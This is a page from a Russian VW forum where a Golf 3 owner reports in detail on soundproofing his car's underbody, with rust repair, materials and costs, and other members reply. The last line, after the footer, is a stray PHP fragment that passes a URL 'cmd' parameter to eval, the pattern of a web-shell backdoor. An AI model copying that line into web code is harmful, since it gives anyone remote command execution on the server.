+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 20

Тема: Шумоиоляция Днища На G3


  1. #1
    GTI-Racing DestorM is on a distinguished road Аватар для DestorM
    Регистрация
    01.02.2007
    Машина
    VW Golf3 VR6
    Сообщений
    347
    Решил выложить фотоотчет по установке шумоизоляции днища на своем гольфе.
    О материалах: покупал 2 типа шумки: Вибротон ПБС-10 (4 листа) и Визомат МП (7листов) Адрес сайта: http://www.stplus.ru , есть офис в Москве на юго-западной.
    По деньгам затраты на материал составили около 3600. Визоматом выкладывал только под торпедой, задние арки и вдоль выхлопной трубы, а Вибротоном по всей поверхности днища. Разборка салона заняла не более 3-х часов. Работа в связи с возникшими трудностями затянулась на несколько дней. Перед тем как стелить днище, я сдирал старый битум, обрабатывал щеткой по металлу, мазал преобразователем грунта и на следующее утро покрыл несколькими слоями битумной мастики. Для того чтобы гнуть листы визомата, пришлось купить строительный фен, около 600р на рынке.
    Все началось примерно так: Под задними креслами битум был посажен на какой то клей, что приходилось кусок за кусочком его отковыривать при помощи стамески с молотком. И то получилось это далеко не везде, в местах образования ржавчины.


    Вот как выглядели дренажные отверстия, пришлось заварить аж 5 заплаток. (Машина 92го года выпуска)


    Общий вид сзади. В последствии вся штатная обшивка была заменена на вибротон, выемка под запаску так же дополнительно была выложена остатками визомата:

    В местах сильно проржавевших пришлось вырезать большие дырки:

    Затем они были заварены: (придаем кузову дополнительную жесткость )



    После того как днище было подготовлено и обработано антикором я покрыл его битумом и, недожидаясь пока он высохнет начал стелить визомат:

    Больше фоток к сожалению нету... При установке некоторые детали пластика пришлось подрезать из за увеличения толщины обшивки. Поломал несколько пластиковых кронштейном крепления внутренней части накладки на пороги. Немного снизился рабочий ход педалей, особенно почувствовалось на сцеплении, но я к этому быстро привык. В общей сложности работа заняла около 2-х дней. По ощущениям от езды уровень шума снизился примерно на 80%.

  2. #2
    Супер, у меня брат год назад тоже самое на моем делал. Вобще как в танке. Только жалко под торпеду не дорался...

  3. #3
    GTI-Racing DestorM is on a distinguished road Аватар для DestorM
    Регистрация
    01.02.2007
    Машина
    VW Golf3 VR6
    Сообщений
    347
    Единственный недостаток конечно- это увеличение веса, кило эдак на 20, не меньше, и это при выборочной обклейке визоматом.
    А в остальном я всем остался очень доволен, при движении на нейтрали в салоне полная тишина.

  4. #4
    Супер Модератор ™B®embo™ is just really nice ™B®embo™ is just really nice ™B®embo™ is just really nice ™B®embo™ is just really nice Аватар для ™B®embo™
    Регистрация
    01.02.2007
    Откуда
    Москва
    Машина
    Mk4 R32 DSG Black Series / Mk4 GTI
    Сообщений
    4,234
    <div class='quotetop'>Цитата(DestorM &#064; Oct 20 2008, 00&#58;47) <{POST_SNAPBACK}></div><div class='quotemain'>Единственный недостаток конечно- это увеличение веса, кило эдак на 20, не меньше, и это при выборочной обклейке визоматом.
    А в остальном я всем остался очень доволен, при движении на нейтрали в салоне полная тишина.[/b][/quote]
    Зачетно&#33;&#33;&#33; Заодно подчистил косяки пола))) 20кг - это ерунда,компенсирешь чем-нибудь...уверен [img]style_emoticons/<#EMO_DIR#>/big_smile.gif[/img]
    Техническое бюро moJotec

    "Продают лошадиные силы, а выигрывает момент!!!"

    Wolf in sheep's clothing;)

  5. #5
    Мимо проходил kol9mba is on a distinguished road Аватар для kol9mba
    Регистрация
    19.11.2008
    Сообщений
    17
    <div class='quotetop'>Цитата(DestorM &#064; Sep 15 2008, 23&#58;26) <{POST_SNAPBACK}></div><div class='quotemain'>Решил выложить фотоотчет по установке шумоизоляции днища на своем гольфе.
    О материалах: покупал 2 типа шумки: Вибротон ПБС-10 (4 листа) и Визомат МП (7листов) Адрес сайта: http://www.stplus.ru , есть офис в Москве на юго-западной.
    По деньгам затраты на материал составили около 3600. Визоматом выкладывал только под торпедой, задние арки и вдоль выхлопной трубы, а Вибротоном по всей поверхности днища. Разборка салона заняла не более 3-х часов. Работа в связи с возникшими трудностями затянулась на несколько дней. Перед тем как стелить днище, я сдирал старый битум, обрабатывал щеткой по металлу, мазал преобразователем грунта и на следующее утро покрыл несколькими слоями битумной мастики. Для того чтобы гнуть листы визомата, пришлось купить строительный фен, около 600р на рынке.
    Все началось примерно так: Под задними креслами битум был посажен на какой то клей, что приходилось кусок за кусочком его отковыривать при помощи стамески с молотком. И то получилось это далеко не везде, в местах образования ржавчины.


    Вот как выглядели дренажные отверстия, пришлось заварить аж 5 заплаток. (Машина 92го года выпуска)


    Общий вид сзади. В последствии вся штатная обшивка была заменена на вибротон, выемка под запаску так же дополнительно была выложена остатками визомата:

    В местах сильно проржавевших пришлось вырезать большие дырки:

    Затем они были заварены: (придаем кузову дополнительную жесткость [img]style_emoticons/<#EMO_DIR#>/big_smile1.gif[/img] )



    После того как днище было подготовлено и обработано антикором я покрыл его битумом и, недожидаясь пока он высохнет начал стелить визомат:

    Больше фоток к сожалению нету... При установке некоторые детали пластика пришлось подрезать из за увеличения толщины обшивки. Поломал несколько пластиковых кронштейном крепления внутренней части накладки на пороги. Немного снизился рабочий ход педалей, особенно почувствовалось на сцеплении, но я к этому быстро привык. В общей сложности работа заняла около 2-х дней. По ощущениям от езды уровень шума снизился примерно на 80%.[/b][/quote]
    Если ты шумку не грел пром феном то все усилия потрачены даром она просто начнет зимой отваливаться

  6. #6
    GTI-Racing DestorM is on a distinguished road Аватар для DestorM
    Регистрация
    01.02.2007
    Машина
    VW Golf3 VR6
    Сообщений
    347
    <div class='quotetop'>Цитата(kol9mba &#064; Nov 24 2008, 18&#58;40) <{POST_SNAPBACK}></div><div class='quotemain'>Если ты шумку не грел пром феном то все усилия потрачены даром она просто начнет зимой отваливаться[/b][/quote]
    Я фен покупал спецом для этой цели, без него эти листы та просто бы не согнулись.

  7. #7
    GTI-Racing PoRsHeN is on a distinguished road Аватар для PoRsHeN
    Регистрация
    13.02.2009
    Машина
    MK4 GTI 1,8T AGU
    Сообщений
    50
    <div class='quotetop'>Цитата(DestorM &#064; Oct 19 2008, 23&#58;47) <{POST_SNAPBACK}></div><div class='quotemain'>Единственный недостаток конечно- это увеличение веса, кило эдак на 20, не меньше, и это при выборочной обклейке визоматом.
    А в остальном я всем остался очень доволен, при движении на нейтрали в салоне полная тишина.[/b][/quote]


    Если машина не под драг, то пофигу на 20-30 кило...........
    А вдруг, если, ......... То нах..р тебе шумка и вибра, и сидения, и торпедо...........

  8. #8
    GTI-Racing DestorM is on a distinguished road Аватар для DestorM
    Регистрация
    01.02.2007
    Машина
    VW Golf3 VR6
    Сообщений
    347
    <div class='quotetop'>Цитата(PoRsHeN &#064; Mar 1 2009, 21&#58;44) <{POST_SNAPBACK}></div><div class='quotemain'>Если машина не под драг, то пофигу на 20-30 кило...........
    А вдруг, если, ......... То нах..р тебе шумка и вибра, и сидения, и торпедо...........[/b][/quote]

    Ну я делал это в первую очередь для того, чтобы снизить огромный шум от глушителя, щас вот музыку поставил: усилок, колонки, кондей, так что набранные кило не жалею, буду еще двери обклеивать, потом здесь выложу фотоотчет, а то они все пляшут от басов.

  9. #9
    GTI-Racing geminus is a jewel in the rough geminus is a jewel in the rough geminus is a jewel in the rough Аватар для geminus
    Регистрация
    31.01.2007
    Откуда
    МО, г.Чехов
    Машина
    Audi A6 Allroad
    Сообщений
    1,260
    <div class='quotetop'>Цитата(DestorM &#064; Mar 5 2009, 00&#58;06) <{POST_SNAPBACK}></div><div class='quotemain'>Ну я делал это в первую очередь для того, чтобы снизить огромный шум от глушителя, щас вот музыку поставил: усилок, колонки, кондей, так что набранные кило не жалею, буду еще двери обклеивать, потом здесь выложу фотоотчет, а то они все пляшут от басов.[/b][/quote]

    я сделал полную, с дверьми проблем нету - режешь вибрик кусочками треугольными и вперёд... двери стали заметно тяжелее, фотки где-то есть, но лень... гораздо больше времени требуют передние подиумы, чтобы динамики жёстко к кузову прилепить и они вставали в родные места...
    AUDI ALLROAD A6 3.0TDI Quattro 6MT
    МО, Чехов
    Иван


  10. #10
    Мимо проходил cosmo is on a distinguished road Аватар для cosmo
    Регистрация
    26.08.2009
    Сообщений
    4
    Отличные фото!
    Сердце кровью обливается:)
    Лучше бы мне заплатил, и не слушал через год веселых жуков под ногами.
    Не спорю для любителя положил ровно, но это надо раскатать,зашумить и спрятать(чтоб не подрезать пластик).
    Молодец конечно,но игра не стоит свеч!!

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Ответов: 6
    Последнее сообщение: 02.01.2024, 02:47
  2. Фото днища
    от Pochemu в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 19
    Последнее сообщение: 02.10.2023, 06:25
  3. Куплю защиту днища на г6
    от 2rbo4ever в разделе Покупка и продажа запчастей
    Ответов: 1
    Последнее сообщение: 24.10.2013, 13:56
  4. Защита днища/картера
    от Rugby 14 в разделе Ремонт и обслуживание
    Ответов: 12
    Последнее сообщение: 30.05.2011, 17:25

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}